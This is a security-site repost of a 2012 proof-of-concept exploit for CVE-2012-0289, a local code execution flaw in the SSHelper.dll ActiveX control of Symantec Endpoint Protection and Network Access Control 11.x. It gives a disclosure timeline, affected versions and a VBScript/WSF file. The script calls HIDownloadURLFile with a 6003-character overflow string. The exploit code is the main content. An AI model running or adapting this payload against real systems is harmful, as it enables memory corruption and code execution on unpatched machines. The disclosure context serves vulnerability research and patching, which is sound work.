首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Symantec End Point Protection 11.x & Symantec Network Access Control 11.x LCE PO
来源:vfocus.net 作者:41.w4r10r 发布时间:2012-05-24  

# Symantec End Point Protection 11.x & Symantec Network Access Control 11.x Local Code Execution POC
# Date: 22/05/2012
# Author: 41.w4r10r
# Software Link: Symantec.com
# Version: 11.x
# Tested on:
#   Windows XP SP2 English
#   Windows XP SP3 English
#   Windows Vista 32Bit
#   Windows 7 32Bit
# CVE : CVE-2012-0289

Time Line:
30/08/2011 - Sent Details of the vulnerability
31/08/2011 - Symantec Requested Affected Version Details
31/08/2011 - Provided Requested Information with POC
27/09/2011 - Vulnerability Confirmed by Symantec
22/05/2012 - Advisory Released

Symantec Advisory:
http://www.symantec.com/security_response/securityupdates/detail.jsp?fid=security_advisory&pvid=security_advisory&year=2012&suid=20120522_01

Affected Products:

Symantec Endpoint Protection
11.0 RU6(11.0.600x)
11.0 RU6-MP1(11.0.6100)
11.0 RU6-MP2(11.0.6200)
11.0 RU6-MP3(11.0.6300)
11.0 RU7(11.0.700x)
11.0 RU7-MP1(11.0.710x)

Symantec Network Access Control
11.0 RU6(11.0.600x)
11.0 RU6-MP1(11.0.6100)
11.0 RU6-MP2(11.0.6200)
11.0 RU6-MP3(11.0.6300)
11.0 RU7(11.0.700x)
11.0 RU7-MP1(11.0.710x)

Affected Resource:
%%System%%\Symantec\Symantec Endpoint Protection\SSHelper.dll

===
POC
===

<?XML version='1.0' standalone='yes' ?>
<package><job id='DoneInVBS' debug='false' error='true'>
<object classid='clsid:D59EBAD7-AF87-4A5C-8459-D3F6B918E7C9' id='target' />
<script language='vbscript'>
prototype  = "Function HIDownloadURLFile ( ByVal cookie As Long ,  ByVal
url As String ,  ByVal file_path As String ,  ByVal rule_name As String ,
 ByVal cancel_message As String ,  ByVal downloading_time As Long ,  ByVal
bResume As Boolean ,  ByVal bShowProgressDlg As Boolean ,  ByVal
bAllowCancel As Boolean ,  ByVal username As String ,  ByVal password As
String ,  ByVal show_error_delay As Long ) As Long"
memberName = "HIDownloadURLFile"
progid     = "SSHELPERLib.SSHelper"
argCount   = 12
arg1=1
arg2="defaultV"
arg3="defaultV"
arg4="defaultV"
arg5="defaultV"
arg6=1
arg7=True
arg8=True
arg9=True
arg10="defaultV"
arg11= String(6003, "A")
arg12=1
target.HIDownloadURLFile arg1 ,arg2 ,arg3 ,arg4 ,arg5 ,arg6 ,arg7 ,arg8
,arg9 ,arg10 ,arg11 ,arg12
</script></job></package>
 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Tftpd32 DHCP Server Denial Of
·Novell Client 4.91 SP4 Privile
·OpenOffice OLE Importer Docume
·FlexNet License Server Manager
·appRain CMF Arbitrary PHP File
·Supernews <= 2.6.1 SQL Injecti
·bsnes v0.87 Local Denial Of Se
·PHP <= 5.4.3 (com_event_sink)
·RabidHamster R4 Log Entry spri
·PHP <= 5.4.3 wddx_serialize_*
·Symantec Web Gateway 5.0.2 Rem
·Foxit Reader 3.0 Open Execute
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved